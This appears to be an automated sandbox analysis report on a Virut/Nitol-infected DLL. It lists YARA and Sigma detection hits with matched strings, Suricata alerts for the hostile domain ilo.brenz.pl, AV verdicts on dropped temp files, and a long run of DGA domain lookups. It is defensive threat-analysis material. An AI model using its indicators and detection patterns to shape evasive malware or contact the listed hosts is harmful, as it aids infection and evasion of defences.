4.2.rundll32.exe.10004090.1.raw.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
4.2.rundll32.exe.10004090.1.raw.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
6.2.hrl97BF.tmp.400000.0.unpack	JoeSecurity_Virut	Yara detected Virut	Joe Security
34.2.zvhcfa.exe.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
34.2.zvhcfa.exe.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
6.2.hrl97BF.tmp.400000.0.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
6.2.hrl97BF.tmp.400000.0.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
0.2.loaddll32.exe.10004090.1.raw.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0.2.loaddll32.exe.10004090.1.raw.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
3.2.rundll32.exe.10004090.1.raw.unpack	CN_disclosed_20180208_Mal1	Detects malware from disclosed CN malware set	Florian Roth	0x74ef:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
3.2.rundll32.exe.10004090.1.raw.unpack	MAL_Nitol_Malware_Jan19_1	Detects Nitol Malware	Florian Roth	0x5724:$xc2: GET ^&&%$%$^ 0x5755:$xc2: GET ^&&%$%$^ 0x5786:$xc2: GET ^&&%$%$^ 0x57b7:$xc2: GET ^&&%$%$^ 0x57e8:$xc2: GET ^&&%$%$^ 0x5819:$xc2: GET ^&&%$%$^ 0x584a:$xc2: GET ^&&%$%$^ 0x587b:$xc2: GET ^&&%$%$^ 0x58ac:$xc2: GET ^&&%$%$^ 0x58dd:$xc2: GET ^&&%$%$^ 0x590e:$xc2: GET ^&&%$%$^ 0x593f:$xc2: GET ^&&%$%$^ 0x5970:$xc2: GET ^&&%$%$^ 0x59a1:$xc2: GET ^&&%$%$^ 0x59d2:$xc2: GET ^&&%$%$^ 0x5a03:$xc2: GET ^&&%$%$^ 0x5a34:$xc2: GET ^&&%$%$^ 0x5a65:$xc2: GET ^&&%$%$^ 0x5a96:$xc2: GET ^&&%$%$^ 0x5ac7:$xc2: GET ^&&%$%$^ 0x5751:$n1: .htmGET
Click to see the 42 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, ParentImage: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, ParentProcessId: 3388, ParentProcessName: hrl97AF.tmp, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p, ProcessId: 752, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: winlogon.exe, CommandLine: winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, ParentImage: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, ParentProcessId: 3388, ParentProcessName: hrl97AF.tmp, ProcessCommandLine: winlogon.exe, ProcessId: 584, ProcessName: winlogon.exe

Suricata Signatures

ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T15:33:35.834773+0100	2012730	1	A Network Trojan was detected	192.168.2.9	63515	1.1.1.1	53	UDP
2024-12-19T15:34:06.119514+0100	2012730	1	A Network Trojan was detected	192.168.2.9	54263	1.1.1.1	53	UDP
2024-12-19T15:34:28.135114+0100	2012730	1	A Network Trojan was detected	192.168.2.9	62070	1.1.1.1	53	UDP
2024-12-19T15:34:36.682015+0100	2012730	1	A Network Trojan was detected	192.168.2.9	62983	1.1.1.1	53	UDP
2024-12-19T15:35:07.041598+0100	2012730	1	A Network Trojan was detected	192.168.2.9	61519	1.1.1.1	53	UDP
2024-12-19T15:35:20.667033+0100	2012730	1	A Network Trojan was detected	192.168.2.9	57170	1.1.1.1	53	UDP

ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T15:34:37.104284+0100	2811577	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.9	50215	UDP
2024-12-19T15:34:38.184663+0100	2811577	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.9	59736	UDP
2024-12-19T15:35:16.020722+0100	2811577	1	A Network Trojan was detected	1.1.1.1	53	192.168.2.9	51823	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 26B1sczZ88.dll

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Windows\SysWOW64\zvhcfa.exe	Avira: detection malicious, Label: W32/Virut.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\SOFTWARE.LOG (copy)	ReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	ReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	ReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	ReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	ReversingLabs: Detection: 97%
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	ReversingLabs: Detection: 97%
Source: C:\Windows\SysWOW64\zvhcfa.exe	ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: 26B1sczZ88.dll

ReversingLabs: Detection: 97%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\zvhcfa.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 26B1sczZ88.dll

Joe Sandbox ML: detected

Source: 26B1sczZ88.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\wctD1EA.tmp.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb837 source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct495D.tmp.pdb\* source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorl source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb949 source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A583178b @ source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\wct102E.tmp.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001677 WaitForSingleObject,wsprintfW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,PathAppendW,PathAppendW,FindFirstFileW,lstrcpyW,lstrcmpiW,lstrcmpiW,lstrcmpiW,WaitForSingleObject,lstrcpyW,PathAppendW,FindClose,PathFindExtensionW,lstrcmpiW,lstrcpyW,PathAppendW,GetFileAttributesW,CopyFileW,SetFileAttributesW,lstrcmpiW,lstrcmpiW,lstrcpyW,PathAppendW,WaitForSingleObject,FindNextFileW,		0_2_10001677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10001677 WaitForSingleObject,wsprintfW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,PathAppendW,PathAppendW,FindFirstFileW,lstrcpyW,lstrcmpiW,lstrcmpiW,lstrcmpiW,WaitForSingleObject,lstrcpyW,PathAppendW,FindClose,PathFindExtensionW,lstrcmpiW,lstrcpyW,PathAppendW,GetFileAttributesW,CopyFileW,SetFileAttributesW,lstrcmpiW,lstrcmpiW,lstrcpyW,PathAppendW,WaitForSingleObject,FindNextFileW,		3_2_10001677

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.9:63515 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.9:54263 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.9:62070 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.9:62983 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.9:61519 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2012730 - Severity 1 - ET MALWARE Known Hostile Domain ilo.brenz .pl Lookup : 192.168.2.9:57170 -> 1.1.1.1:53

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: xshsnl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: acxyxy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yhflfd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fybyzv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yulrvp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fxyavq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: unkwhv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ahaotq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zemivi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rqicen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rhwuas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qiuifw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pyhqpe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ihybog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oxoimf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uycyms.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iqewjg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uquewo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pimqle.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fzlikn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: raygxc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ilommd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uxbegb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdqboa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qikggc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dazrfy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: evbzsz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jhkuku.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lfsmdz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: empymm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ant.trenz.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: myivov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: troslw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eqpzuu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lacjuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xgjldw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaiuio.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tlfjcd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bsmxax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ikuhms.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ynwpie.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeixpq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: euekdh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oaceeo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vnunre.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eoswhi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kduiuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yqhfpu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: isaykc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dkevii.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vdafki.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: engkkn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ugiwuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vzvwin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: frvzle.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kpyyyy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oehqcn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gnwvmu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ldgoti.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: auieai.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lniyuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iotqbe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: giqxuy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yokuap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qyhuju.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jzaoby.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ecbklt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zgawte.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: heupjk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wxjaht.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ikxyaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pugtjb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fzhchl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hxhxsk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eekder.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uergsz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wohbil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bsfxpd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nxygpr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nsqixt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zitymm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cioyuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qnrfpi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iapseh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ngelut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: saambd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yivmlj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ahmeqf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nlqjng.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vbahvh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: htqqvy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: phdomu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: siytue.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pnfkay.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tcepna.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vezeoe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: anvdkc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gqmneh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eexjix.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zdtwjb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ilo.brenz.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: dexric.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zsinsv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hcpgso.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tpwowx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: goyzko.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gjtywo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ivsego.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iaaucc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ovprrb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wmducp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zirafk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uepolc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smhcbm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yirgbw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gnxmfg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eqoxwa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bkydbf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: raodpi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qgwhsw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zcuofo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jfppeu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: phhuqd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qyflyk.com replaycode: Name error (3)
